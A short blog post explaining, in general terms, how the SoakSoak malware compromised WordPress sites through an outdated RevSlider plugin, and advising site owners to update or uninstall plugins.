Everything about SoakSoak Malware & Its Impact on the Blog-O-Sphere

Recently, more than 100,000 WordPress sites had been affected by an assailable third-party plug-in, and this number is expected to increase further. The open-source WordPress blogging and content management system (CMS) is at heavy risk due to this third-party plug-in; and some of them may not even realize that they are running. Today, thousands of WordPress Websites are, thus, susceptible to exploitation via this malware known as SoakSoak.

The Attack

It is extremely important to understand how the SoakSoak malware functions as WordPress is one of the most popular and widely used Web publishing platforms. Understanding how it works, can help you prevent your WordPress site from being compromised.

Roughly one in six websites—nearly around 60 million worldwide are hosted through WordPress. The malware had been eyeing WordPress sites for long. The attackers behind this malware inject their malicious code into different JavaScript files. This means the damage could get even worse if not prevented.

In the beginning, the attackers targeted wp-includes/template-loader.php. Once the file has been compromised, the JavaScript created by the attackers is visible on every page on the infected site. This code then downloads malware from a remote domain. The attackers have started modifying their tactics and have also changed the JavaScript code that they target with the SoakSoak malware, thereby infecting a new group of Web sites.

Google had taken a few steps to deal with this issue by blacklisting thousands of those sites which had been infected by SoakSoak. This exposure to attack was mended by the plugin’s developers, but the websites that haven’t been updated are still prone to these attacks.

The Impact

The SoakSoak malware has been infecting more outdated versions of the WordPress plugin called RevSlider. Essentially, the real vulnerability is in the RevSlider third-party plug-in. This plug-in is more often than not bundled in WordPress themes that WordPress site developers choose to install. Mostly, versions prior to 4.2 are being targeted. Now, the actual issue here is that the RevSlider plugin is a premium plugin. It cannot be easily upgraded making it a disaster on its own for any site owner. Most users don’t even realize that this plug-in has been bundled into their WordPress themes.

Just like many WordPress security cases, the main culprit in this scenario is the plugin. These plug-ins which are very outdated are unsafe and very difficult to upgrade as opposed to WordPress core. This is one reason why it is important for WordPress users to upgrade their systems with the latest versions of all plugins so as to avoid other malware attacks.

The Solution

What can you do to prevent your WordPress site from being endangered? Uninstall any plugins that you aren’t using. Apparently, the minds behind the SoakSoak Malware are tapping existing vulnerabilities in WordPress plugins as an easier method of spreading malware through WordPress sites. Most developers do not actively maintain and monitor the plug-ins they themselves install, making them an easy doorway for attacking a website. Therefore, you need to ensure that you keep WordPress and associated plugins updated.

While this may not go well with the average users of WordPress sites, the fact remains that updating or uninstalling unwanted plugins is amongst the best security practices. Security experts have always advised to maintain and update all software and drivers regularly. Network administrators are very well aware that it’s best to uninstall add-ons that will remain unused failing which they would expose their server to an unwanted risk.

We hope this was useful to you. Do leave your comments below.

Ajeet Mishra

Ajeet Mishra

Ajeet is a Senior Account Manager, who doesn't miss any weekends without playing CRICKET!